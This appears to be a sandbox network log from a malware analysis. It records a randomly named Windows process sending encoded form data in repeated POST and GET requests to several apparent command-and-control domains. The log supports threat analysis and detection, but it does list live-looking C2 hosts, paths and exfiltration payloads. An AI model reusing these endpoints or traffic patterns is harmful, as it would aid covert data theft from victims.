1 | 192.168.2.4 | 49738 | 3.33.130.190 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 09:24:10.522964954 CEST | 807 | OUT | POST /7xi5/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.omexai.info
                                                    Origin: http://www.omexai.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.omexai.info/7xi5/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Ascii: y0qt3F=vzgY5DchbUTuDj4fU6YHupsGSPXmRFIgl5JAt+Mu7jLtHR577s0pgay7RHxaaQJVsBD1xGp+m6f/S65yCr8VZDvDDjHzj12CtboS8SwNecB747akbLotYQRoKWsOiroaGUZSlePOGWjy7ys5eNiGTqnn495rkwRe5hbXbPv8OsLjCAcpqmQOo1Wpau5ANHvVsg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 3.33.130.190 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 09:24:13.071923018 CEST | 827 | OUT | POST /7xi5/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.omexai.info
                                                    Origin: http://www.omexai.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.omexai.info/7xi5/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Ascii: y0qt3F=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7QjtHwJ76ucplay7J3xGUwJCsBfLxCt+m+//S6JyCYUaDzvNXTHx+F2CtboS8S03ecp74rqkapMiVwRvcmsOmroWGUZKle+GGUry7yc5eZ+HIanb1d4fqx1W+QfeUPr8Rv7BKmNz7XxZ61yaHpw0AESc3iT+gf5QqSGUiCs+J1MwboU=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 3.33.130.190 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 09:24:15.610882044 CEST | 10909 | OUT | POST /7xi5/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.omexai.info
                                                    Origin: http://www.omexai.info
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.omexai.info/7xi5/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Ascii: y0qt3F=vzgY5DchbUTuCDIfY5wH/5sJXPXmfVIsl5NAt/YE7W7tHiB74Pcpmay7AXxFUwJfsBHPxChIm4z/TZByKJUaNDvNIDH0j12ytb5V8TE3ecp74pCkd7oiGgRoKWsCirpDGUB0laiWHlLy4SM5fsiHEanjyd4HqxII+U+nUM2bRoLBOCU0nWFylDuQSbk3L0qc5wzxzN52/Rurm1BBaENzY4muHvpvikHHlSz1zCtWC8qikMr3dqb1stE/OMbOKLzurF7baxXcuj69Ckvezv4+HfSz1ehgJx6roPJkg0jvExK7KXzy4SYEkWQsRXyjbogi+ez+pucPyCa9AoYlGLu+jqcDvYWLfYd1qkMYV6LVQ9Dk4aY7/ItPKefbKZFtJy7Iab/I4C62tzudCGJYKTbcYpS1Qa92uzzxmtA3tpkeBWhlujEJx17XyhLgkBzRjNt723uss0BOc3fgeDC50sw2kb3bZij8VA4let57uGhDUTlXykKt5Sz/vP9rOJxq5c2fe2ECl0ay7bebXd0dFxS9hgU5cHKSBfhMglLlObVRwKMKe0dT5jKaLh1pq3oiAu3UAiC7wQVK/TH3qB7EJ5i0kjnjBh5v7ygB+JacoYfibrLerAPMWUoUDWD5fQDF0CjF04dozODAOZ72ZQEkVTRz4A2fp8zufnhV5ngxHYGNnv+91izWf01awE3pJGIvFGgykpT1kU9Xubmzy8cOAK5mdINtrOLF0IT+x87Me70nhuSGKleYM6Mqumao8lvlmO8P9rJydt5d6wlvrE0tr4yA0mCof8uVT6wDlJNnpvqOXXqi85vn1ZTSkNmmH8FjcSuQEbl6/+oPKVNVtiYNJsta2f6zjqLWuXxkjmT4SRK/xgcL5xoIr7gqO25UxQr7P/NTnr/qXDlizBL9m6phnJa3XcMIrsRPdDAEdsAUm4frUKn7/sPJUqaq861FLMcHqxEMjjGym01CfcCGyhjrAJVJouOwl9j6rYXCcVfZREk4mkylE [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49741 | 3.33.130.190 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
Timestamp | Bytes transferred | Direction | Data
Sep 26, 2024 09:24:18.153629065 CEST | 541 | OUT | GET /7xi5/?y0qt3F=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.omexai.info
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:24:21.563687086 CEST  |  391  |  IN  |  HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Thu, 26 Sep 2024 07:24:21 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 251
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 79 30 71 74 33 46 3d 69 78 49 34 36 7a 77 44 4e 57 4f 6f 4b 30 64 36 64 35 39 53 76 70 67 44 42 2b 7a 71 53 46 41 2b 71 73 46 4c 2b 76 34 68 7a 78 71 46 47 54 34 70 33 2b 38 57 74 6f 50 4b 47 55 73 2f 61 54 31 66 6b 44 6e 63 78 51 52 66 6c 70 71 4a 56 75 4e 51 46 62 45 4c 42 78 2f 2b 50 45 58 72 70 46 36 33 75 70 74 46 32 67 77 4b 41 63 4e 61 6f 4a 65 6c 5a 34 35 69 48 48 34 3d 26 6b 5a 3d 45 38 57 70 49 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?y0qt3F=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&kZ=E8WpI"}</script></head></html>


                                                    Session ID: 5  |  Source IP: 192.168.2.4  |  Source Port: 49742  |  Destination IP: 172.191.244.62  |  Destination Port: 80  |  PID: 1880
                                                    Process: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp  |  Bytes transferred  |  Direction  |  Data
                                                    Sep 26, 2024 09:24:27.320738077 CEST  |  807  |  OUT  |  POST /fpzw/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.tekilla.wtf
                                                    Origin: http://www.tekilla.wtf
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.tekilla.wtf/fpzw/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 5a 59 70 59 62 77 72 56 71 75 6a 52 30 5a 66 55 35 75 31 65 7a 36 63 32 6e 5a 55 78 52 71 58 4e 76 64 6a 36 69 61 68 4c 38 57 43 31 41 56 38 56 36 31 4f 58 47 67 54 34 35 35 6e 38 56 56 43 54 6f 43 59 32 36 33 44 33 5a 44 59 46 61 77 44 31 4b 70 49 64 36 79 42 73 35 59 7a 4a 64 66 56 31 66 73 41 55 30 37 68 72 75 6f 75 49 5a 68 31 45 33 65 6d 56 61 43 49 6f 66 53 72 64 58 67 50 65 4b 64 52 66 76 79 6c 4e 41 2b 47 54 56 6f 7a 55 54 6a 41 61 43 64 2b 66 31 69 2b 75 2b 79 6f 68 58 41 73 6f 43 57 70 4e 57 4e 4e 6c 34 78 69 6e 77 6b 34 4d 51 3d 3d
                                                    Data Ascii: y0qt3F=imRwTcaaL03jmZYpYbwrVqujR0ZfU5u1ez6c2nZUxRqXNvdj6iahL8WC1AV8V61OXGgT455n8VVCToCY263D3ZDYFawD1KpId6yBs5YzJdfV1fsAU07hruouIZh1E3emVaCIofSrdXgPeKdRfvylNA+GTVozUTjAaCd+f1i+u+yohXAsoCWpNWNNl4xinwk4MQ==
                                                    Sep 26, 2024 09:24:27.786573887 CEST  |  195  |  IN  |  HTTP/1.1 404 Not Found
                                                    Content-Type: text/plain; charset=utf-8
                                                    X-Content-Type-Options: nosniff
                                                    Date: Thu, 26 Sep 2024 07:24:27 GMT
                                                    Content-Length: 19
                                                    Connection: close
                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                    Data Ascii: 404 page not found


                                                    Session ID: 6  |  Source IP: 192.168.2.4  |  Source Port: 49743  |  Destination IP: 172.191.244.62  |  Destination Port: 80  |  PID: 1880
                                                    Process: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp  |  Bytes transferred  |  Direction  |  Data
                                                    Sep 26, 2024 09:24:29.860094070 CEST  |  827  |  OUT  |  POST /fpzw/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.tekilla.wtf
                                                    Origin: http://www.tekilla.wtf
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.tekilla.wtf/fpzw/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 69 65 58 4e 4c 5a 6a 37 6a 61 68 46 63 57 43 37 67 55 33 62 61 31 48 58 47 73 62 34 35 56 6e 38 56 70 43 54 70 53 59 32 4a 66 43 78 4a 44 47 4e 36 77 42 34 71 70 49 64 36 79 42 73 35 4e 57 4a 63 33 56 30 75 63 41 47 41 58 75 6a 4f 6f 74 59 70 68 31 56 6e 65 69 56 61 43 2b 6f 64 6d 53 64 56 6f 50 65 4c 74 52 52 65 79 6d 61 77 2b 36 4f 6c 70 45 53 6a 53 37 52 54 6b 33 58 6b 4b 5a 68 65 36 6b 74 78 52 32 35 7a 33 2b 66 57 70 2b 34 2f 34 57 71 7a 5a 78 58 65 54 50 6c 75 58 57 6b 71 65 7a 52 6e 2b 31 39 61 4c 57 69 32 67 3d
                                                    Data Ascii: y0qt3F=imRwTcaaL03jm5Ipa4orQKugeUZfDpuxe0yc2l1ExieXNLZj7jahFcWC7gU3ba1HXGsb45Vn8VpCTpSY2JfCxJDGN6wB4qpId6yBs5NWJc3V0ucAGAXujOotYph1VneiVaC+odmSdVoPeLtRReymaw+6OlpESjS7RTk3XkKZhe6ktxR25z3+fWp+4/4WqzZxXeTPluXWkqezRn+19aLWi2g=
                                                    Sep 26, 2024 09:24:30.335239887 CEST  |  195  |  IN  |  HTTP/1.1 404 Not Found
                                                    Content-Type: text/plain; charset=utf-8
                                                    X-Content-Type-Options: nosniff
                                                    Date: Thu, 26 Sep 2024 07:24:30 GMT
                                                    Content-Length: 19
                                                    Connection: close
                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                    Data Ascii: 404 page not found


                                                    Session ID: 7  |  Source IP: 192.168.2.4  |  Source Port: 49744  |  Destination IP: 172.191.244.62  |  Destination Port: 80  |  PID: 1880
                                                    Process: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp  |  Bytes transferred  |  Direction  |  Data
                                                    Sep 26, 2024 09:24:32.408077002 CEST  |  10909  |  OUT  |  POST /fpzw/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.tekilla.wtf
                                                    Origin: http://www.tekilla.wtf
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.tekilla.wtf/fpzw/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 69 6d 52 77 54 63 61 61 4c 30 33 6a 6d 35 49 70 61 34 6f 72 51 4b 75 67 65 55 5a 66 44 70 75 78 65 30 79 63 32 6c 31 45 78 6a 6d 58 4e 65 4e 6a 36 41 79 68 45 63 57 43 6c 77 55 30 62 61 30 48 58 46 63 66 34 35 4a 5a 38 51 74 43 51 4f 53 59 30 34 66 43 34 4a 44 47 50 36 77 45 31 4b 70 64 64 35 61 4e 73 35 64 57 4a 63 33 56 30 74 30 41 52 45 37 75 6c 4f 6f 75 49 5a 68 68 45 33 65 4b 56 5a 79 75 6f 64 79 64 65 6b 49 50 65 72 39 52 54 73 71 6d 59 51 2b 34 4e 6c 70 63 53 6a 65 6b 52 54 34 52 58 6b 4f 6a 68 63 6d 6b 38 32 55 79 67 6e 44 79 65 41 35 6b 73 50 38 43 76 68 78 64 53 2b 7a 48 74 73 2f 4b 38 2b 61 74 53 47 62 72 67 5a 47 63 78 52 74 45 55 79 4a 76 34 4a 2b 34 50 34 67 33 32 6f 61 52 47 52 57 59 6a 68 34 61 58 6c 61 53 6b 6a 4f 44 65 59 37 70 36 6f 30 73 52 4d 4b 35 33 64 58 69 30 75 6f 62 45 5a 57 43 2b 6d 55 4e 59 72 59 6b 4a 65 50 30 52 59 4c 44 36 30 53 6d 57 69 79 4b 47 51 75 4f 39 51 49 31 41 42 53 2f 2f 4a 64 6e 77 4f 7a 41 74 41 30 71 69 74 4f 6e 72 38 54 41 34 44 67 [TRUNCATED]
                                                    Data Ascii: y0qt3F=[TRUNCATED]


                                                    Session ID: 8  |  Source IP: 192.168.2.4  |  Source Port: 49745  |  Destination IP: 172.191.244.62  |  Destination Port: 80  |  PID: 1880
                                                    Process: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp  |  Bytes transferred  |  Direction  |  Data
                                                    Sep 26, 2024 09:24:34.950689077 CEST  |  541  |  OUT  |  GET /fpzw/?kZ=E8WpI&y0qt3F=vk5QQsijTkj0pfF2YbFfXs6zKmlYZL+gcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVw6vzCqwT6MlUYIeNh7VIWund7P0tYTSeyak= HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.tekilla.wtf
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:24:35.420710087 CEST  |  195  |  IN  |  HTTP/1.1 404 Not Found
                                                    Content-Type: text/plain; charset=utf-8
                                                    X-Content-Type-Options: nosniff
                                                    Date: Thu, 26 Sep 2024 07:24:35 GMT
                                                    Content-Length: 19
                                                    Connection: close
                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                    Data Ascii: 404 page not found


                                                    Session ID: 9  |  Source IP: 192.168.2.4  |  Source Port: 49746  |  Destination IP: 172.96.191.39  |  Destination Port: 80  |  PID: 1880
                                                    Process: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp  |  Bytes transferred  |  Direction  |  Data
                                                    Sep 26, 2024 09:24:40.835298061 CEST  |  816  |  OUT  |  POST /3qit/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.bola88site.one
                                                    Origin: http://www.bola88site.one
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.bola88site.one/3qit/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 67 31 45 79 62 67 73 31 62 6f 61 58 68 59 54 73 57 54 66 36 37 76 41 63 2b 35 75 72 4b 42 75 63 73 41 36 42 31 4a 69 30 42 38 79 4f 30 6d 61 7a 45 71 33 54 6b 66 6c 78 50 70 51 77 58 52 4f 6d 51 41 58 37 38 39 52 48 36 79 30 34 38 6a 65 4c 73 55 38 30 49 43 74 70 32 35 64 2b 42 73 62 45 44 6a 65 44 42 5a 68 31 49 31 69 61 7a 79 6e 36 74 58 6f 4c 71 49 74 7a 4d 57 64 52 65 31 69 52 74 6a 70 70 4a 49 2f 7a 58 4a 35 39 2f 58 31 2f 34 2f 77 57 46 66 51 65 58 54 5a 63 37 6e 47 65 55 49 4d 6a 66 6b 6f 31 6c 74 4e 35 2b 6b 65 6e 62 68 45 5a 73 78 54 46 46 39 6b 2b 30 2b 43 56 5a 77 3d 3d
                                                    Data Ascii: y0qt3F=g1Eybgs1boaXhYTsWTf67vAc+5urKBucsA6B1Ji0B8yO0mazEq3TkflxPpQwXROmQAX789RH6y048jeLsU80ICtp25d+BsbEDjeDBZh1I1iazyn6tXoLqItzMWdRe1iRtjppJI/zXJ59/X1/4/wWFfQeXTZc7nGeUIMjfko1ltN5+kenbhEZsxTFF9k+0+CVZw==
                                                    Sep 26, 2024 09:24:41.763046980 CEST  |  1033  |  IN  |  HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Thu, 26 Sep 2024 07:24:41 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                    Session ID: 10  |  Source IP: 192.168.2.4  |  Source Port: 49747  |  Destination IP: 172.96.191.39  |  Destination Port: 80  |  PID: 1880
                                                    Process: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp  |  Bytes transferred  |  Direction  |  Data
                                                    Sep 26, 2024 09:24:43.378123045 CEST  |  836  |  OUT  |  POST /3qit/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.bola88site.one
                                                    Origin: http://www.bola88site.one
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.bola88site.one/3qit/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 6d 4f 30 47 71 7a 46 72 33 54 6c 66 6c 78 48 4a 51 31 64 78 50 6b 51 41 72 4e 38 2f 31 48 36 32 6b 34 38 69 75 4c 76 6c 38 33 61 69 74 72 77 35 64 77 4f 4d 62 45 44 6a 65 44 42 5a 64 66 49 31 36 61 7a 44 58 36 74 32 6f 4b 70 49 74 30 50 57 64 52 4d 46 69 56 74 6a 70 41 4a 4a 7a 5a 58 4c 78 39 2f 57 46 2f 32 4f 77 58 51 76 51 59 5a 7a 59 4f 79 6c 48 77 65 59 6c 54 41 6b 73 69 6a 63 68 39 79 43 50 39 4b 51 6c 4f 2b 78 33 32 59 36 74 4b 35 39 2f 63 43 7a 34 74 7a 4b 39 38 71 6c 31 6f 69 31 6b 45 72 42 4f 42 34 66 49 3d
                                                    Data Ascii: y0qt3F=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOmO0GqzFr3TlflxHJQ1dxPkQArN8/1H62k48iuLvl83aitrw5dwOMbEDjeDBZdfI16azDX6t2oKpIt0PWdRMFiVtjpAJJzZXLx9/WF/2OwXQvQYZzYOylHweYlTAksijch9yCP9KQlO+x32Y6tK59/cCz4tzK98ql1oi1kErBOB4fI=
                                                    Sep 26, 2024 09:24:44.287662029 CEST  |  1033  |  IN  |  HTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 796
                                                    date: Thu, 26 Sep 2024 07:24:44 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 